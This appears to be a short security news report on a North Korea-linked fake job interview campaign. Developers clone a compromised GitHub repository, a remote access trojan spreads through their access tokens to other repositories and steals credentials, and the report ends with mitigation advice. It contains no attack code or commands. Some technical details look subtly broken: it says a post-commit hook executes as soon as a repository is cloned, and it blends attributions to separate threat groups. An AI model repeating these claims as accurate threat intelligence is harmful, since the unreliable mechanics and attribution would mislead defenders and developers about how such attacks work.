North Korean Fake Job Scams Self-Propagate via Contagious Interview

Security researchers have uncovered a sophisticated attack campaign linked to Democratic People’s Republic of Korea (DPRK) threat actors that combines fake job offers with a worm‑like infection mechanism. The scheme begins with convincing phishing emails that advertise high‑paying remote software‑engineering positions. Recipients are asked to complete a "technical interview" by cloning a GitHub repository that is presented as a test environment. Unbeknownst to the victims, the repository has been compromised; a malicious post‑commit hook or a tampered build script is embedded in the project, allowing the attacker to execute code on the developer’s machine as soon as the repository is cloned or the build process runs.

Once the initial host is infected, the malware leverages the compromised developer’s access tokens to propagate to other repositories the user maintains or contributes to. By injecting a similar hook into those repos, the threat actor creates a self‑propagating chain that spreads the malicious payload across the victim’s entire development ecosystem without any additional user interaction. The payload delivered in this wave is a remote access trojan (RAT) identified as a variant of the "FALLCHILL" malware family, previously attributed to the DPRK "Hidden Cobra" group. The RAT communicates with a command‑and‑control (C2) server via an encrypted HTTPS channel, and upon successful beaconing it drops additional modules that harvest Git credentials, SSH keys, and environment variables.

The ultimate goal of the campaign is exfiltration of proprietary source code and intellectual property, which can be used for resale on underground markets or fed into DPRK’s own state‑sponsored development efforts. In addition, the RAT enables the attackers to execute arbitrary commands, install keyloggers, and establish persistent footholds for future intrusions. Researchers from Unit 42 and Mandiant have linked the infrastructure to IP ranges associated with the Kimsuky APT group, further confirming the nation‑state origin of the operation.

Organizations can mitigate the risk by enforcing strict supply‑chain security practices: verify the integrity of external repositories with checksums or signed commits, restrict CI/CD pipeline permissions, and employ runtime monitoring to detect unusual hook execution. Endpoint detection and response (EDR) solutions should flag post‑commit scripts that attempt to spawn shell processes or write to unexpected locations. Security teams are also advised to educate developers about the dangers of unsolicited job offers that require cloning repositories, and to implement multi‑factor authentication on all accounts that have access to code hosting platforms.